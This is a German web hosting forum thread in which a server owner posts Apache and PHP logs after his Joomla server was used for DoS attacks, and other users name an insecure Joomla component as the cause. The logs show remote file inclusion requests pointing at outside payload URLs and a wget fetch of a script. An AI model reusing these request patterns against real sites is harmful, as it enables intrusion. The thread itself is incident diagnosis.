Server zum Hacking verwendet?

U

URiCK

New Member
Hi,

es ist nun schon 2 mal vorgekommen, dass mein Server gesperrt wurde, da ausgehende DoS Attaken festgestellt wurden.

Gestern habe ich zufällig folgende Einträge in Logdateien gefunden:

in /var/log/apache2/error_log
Code: 
[Thu Dec 13 15:31:52 2007] [error] an unknown filter was not added: includes
[Thu Dec 13 15:32:13 2007] [error] an unknown filter was not added: includes
--15:32:14--  http://jointrulez.helloweb.eu/list/to.txt
           => `to.txt'
Resolving jointrulez.helloweb.eu... 89.186.95.85
Connecting to jointrulez.helloweb.eu|89.186.95.85|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 67,928 (66K) [text/plain]

    0K .......... .......... .......... .......... .......... 75%  225.62 KB/s
   50K .......... ......                                     100%    6.37 MB/s

15:32:14 (295.99 KB/s) - `to.txt' saved [67928/67928]

[Thu Dec 13 15:32:19 2007] [error] an unknown filter was not added: includes
[Thu Dec 13 15:32:29 2007] [error] an unknown filter was not added: includes

in /var/log/apache2/access_log
Code: 
127.0.0.1 - - [13/Dec/2007:13:43:16 +0100] "GET / HTTP/1.0" 200 3523 "-" "Apache/2.2.0 (Linux/SUSE) (internal dummy connection)"
127.0.0.1 - - [13/Dec/2007:15:50:14 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:15:50:14 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:01:20 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:52 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:53 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:53 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:08:56 +0100] "GET / HTTP/1.0" 200 3523 "-" "Apache/2.2.0 (Linux/SUSE) (internal dummy connection)"

in /srv/www/vhosts/XYZ/httpdocs/statistics/logs/error_log
Code: 
hu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP Warning:  parse_url(/index.php?page=http://sagasufx.com/rulez.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /srv/www/vhosts/XYZ/httpdocs/administrator/components/com_astatspro/counter.php on line 321
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP Stack trace:
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   1. {main}() /srv/www/vhosts/XYZ/httpdocs/index.php:0
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   2. require_once() /srv/www/vhosts/XYZ/httpdocs/index.php:265
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   3. mosLoadModules() /srv/www/vhosts/XYZ/httpdocs/templates/mesa_template_2/index.php:137
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   4. modules_html::module2() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.php:166
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   5. modules_html::modoutput_naked() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.html.php:117
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   6. include() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.html.php:338
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   7. include() /srv/www/vhosts/XYZ/httpdocs/modules/mod_astatspro.php:277
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP   8. parse_url() /srv/www/vhosts/XYZ/httpdocs/administrator/components/com_astatspro/counter.php:321


Ich weis nicht was die entsprechende Person da genau erreichen wollte und wie sie es angestellt hat. Vorallem die erste Logdatei beunruhigt mich sehr. Wenn diese to.txt wirklich heruntergeladen wurde, steht da ziemlich viel Schabernack drinnen.
Denn in der Datei werden noch weitere Skripte, z.b. von Albanian Security Clan geladen. (Angänge 11.txt und s.txt - Achtung eine wird sogar als Virus erkannt!!)

Auf dem Server befinden sich nur Joomla Webauftritte.

Ist aus meinen Angaben ersichtlich was da passiert ist und wie ich sowas in Zulunft vermeiden kann?
Mit welchen Infos kann ich noch dienen? php.ini?

Danke,
URiCK
 

Attachments

Last edited by a moderator:
Typischer Fall von unsicherem Joomla Module, und zwar was ich so seh in diesem Fall "com_astatspro". Das ist leider immer wieder ein Problem, weshalb wir unseren Kunden im Zweifelsfall von Joomla auch abraten.
 
Hast Du die Datei gelöscht? Den Ports geschlossen, außer SSH? Du wirst Dein Joomla nicht entsprechend abgesichert und aktuell gehalten haben.

--marneus
 
Ich habe leider keine Ahnung wo sich diese Datei auf dem Server befindet. Gefunden habe ich sie nicht. Wurde vllt. umbenannt?
 
You must log in or register to reply here.
Back
Top